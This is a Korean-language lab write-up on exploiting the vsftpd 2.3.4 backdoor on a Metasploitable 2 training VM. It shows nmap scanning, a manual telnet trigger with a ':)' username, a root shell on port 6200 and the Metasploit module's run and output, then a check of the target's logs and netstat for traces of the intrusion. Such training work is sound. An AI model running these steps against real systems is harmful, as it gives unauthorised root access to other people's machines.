Metasploitable V2 Linux 취약성 ( VSFTPD backdoor )

- 사용 시스템 

KaliLinux

Metasploitable V2 Linux

- VSFTPD BUG

On port 21, Metasploitable2 runs vsftpd(vsftpd-2.3.4), a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" [ a happy face ], the backdoored version will open a listening shell on port 6200. We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it.

This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

exploit/unix/ftp/vsftpd_234_backdoor 

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available.

> vsftp 2.3.4 버전에 backdoor가 설치 되어있는데 그 backdoor는 21번 포트로 vsftpd를 실행하고 username에 :) 라는 것을 입력하면 6200번 포트를 쉘을 오픈할 수 있게 된다. 이러한 버그는 2011년 6월 30일에서 7월 1일까지 배포된 vsftp-2.3.4.tar.gz에 나타나는 버그이다. 

- 실습

(kali)

1. 서비스 버전 확인

# nmap -sV -p 21 192.168.17.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-14 20:37 KST Nmap scan report for 192.168.17.1 Host is up (0.00045s latency). PORT   STATE    SERVICE VERSION 21/tcp filtered ftp MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.17.2 Host is up (0.00035s latency). PORT   STATE  SERVICE VERSION 21/tcp closed ftp MAC Address: 00:50:56:E0:95:FA (VMware) Nmap scan report for 192.168.17.100 Host is up (0.00026s latency). PORT   STATE  SERVICE VERSION 21/tcp closed ftp MAC Address: 00:0C:29:7C:D6:E6 (VMware) Nmap scan report for 192.168.17.134 Host is up (0.00017s latency). PORT   STATE SERVICE VERSION 21/tcp open  ftp     vsftpd 2.3.4 MAC Address: 00:0C:29:FA:DD:2A (VMware) Service Info: OS: Unix Nmap scan report for 192.168.17.254 Host is up (0.00046s latency). PORT   STATE    SERVICE VERSION 21/tcp filtered ftp MAC Address: 00:50:56:F6:FA:06 (VMware) Nmap scan report for 192.168.17.50 Host is up (0.000045s latency). PORT   STATE  SERVICE VERSION 21/tcp closed ftp Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 256 IP addresses (6 hosts up) scanned in 6.36 seconds

> 이 버전이 무조건 버그가 있는 버전은 아니다. 

2. 백도어 동작

# telnet 192.168.17.134 21

Trying 192.168.17.134... Connected to 192.168.17.134. Escape character is '^]'. 220 (vsFTPd 2.3.4) user back:) 331 Please specify the password. pass aaaa ^] telnet> quit Connection closed.

3. 백도어 포트 6200번 으로 telnet 접속

# telnet 192.168.17.134 6200

Trying 192.168.17.134... Connected to 192.168.17.134. Escape character is '^]'. id; uid=0(root) gid=0(root) : command not found hostname; metasploitable : command not found exit; Connection closed by foreign host.

> root 권한으로 바로 실행된다.  버그가 존재한다. 

4. msfconsole 을 통한 공격 ( 패킷 분석 )

# wireshark &

# msfconsole

msf > search vsftpd Matching Modules ================    Name                                  Disclosure Date  Rank       Description    ----                                  ---------------  ----       -----------    exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor):    Name   Current Setting  Required  Description    ----   ---------------  --------  -----------    RHOST                   yes       The target address    RPORT  21               yes       The target port (TCP) Exploit target:    Id  Name    --  ----    0   Automatic msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor):    Name   Current Setting  Required  Description    ----   ---------------  --------  -----------    RHOST                   yes       The target address    RPORT  21               yes       The target port (TCP) Exploit target:    Id  Name    --  ----    0   Automatic msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.17.134 RHOST => 192.168.17.134 msf exploit(vsftpd_234_backdoor) > exploit  [*] 192.168.17.134:21 - Banner: 220 (vsFTPd 2.3.4) [*] 192.168.17.134:21 - USER: 331 Please specify the password. [+] 192.168.17.134:21 - Backdoor service has been spawned, handling... [+] 192.168.17.134:21 - UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 1 opened (192.168.17.50:34901 -> 192.168.17.134:6200) at 2017-11-14 20:42:36 +0900 id uid=0(root) gid=0(root) hostname metasploitable

> root 사용자로 접근이 되었다. 

> meta에서 확인하기 위해 접속을 끊지 않고 대기한다. '

패킷 확인

> 위와 같은 내용을 주고 받았습니다. 

- Meta 서버에서 공격 상황 확인 

(meta)

$ sudo su -

# who

# w

# last | head 20

# cd /var/log

# cat secure

# cat messages

# cat auth.log

> 모두 접속된 흔적을 찾을 수 없었다. 

실행되고 있는 프로그램 검색

# netstat -antp 

> 실행되는 tcp 프로그램을 검색합니다. established 된것이 눈에 띕니다. 다시 검색합니다. 

> PID 번호를 가지고 프로세스를 검색해보니 root가 sh 를 사용하고 있습니다. 관리자 자신이 열고 있는 것이 아니므로 위험한 상황